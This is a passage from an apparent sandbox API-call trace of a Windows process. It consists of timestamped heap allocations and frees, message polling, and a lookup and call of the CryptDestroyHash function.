hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0029.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0029.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0029.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0029.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889dd8 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce80 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899a0 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0029.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0029.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0029.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c760 [0029.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.479] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0029.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0029.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0029.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9c8 [0029.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0029.481] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0029.481] CryptDestroyHash (hHash=0x7c2100) returned 1 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.483] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0029.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0029.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0029.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0029.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: 